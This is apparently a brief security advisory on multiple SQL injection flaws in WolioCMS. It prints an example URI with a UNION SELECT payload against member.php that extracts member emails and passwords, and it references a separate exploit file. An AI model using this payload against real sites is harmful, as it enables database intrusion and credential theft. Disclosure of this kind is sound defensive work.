WolioCMS Multiple SQL Injection Vulnerabilities

WolioCMS Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*

Sample exploit code is also available:

/data/vulnerabilities/exploits/25134.html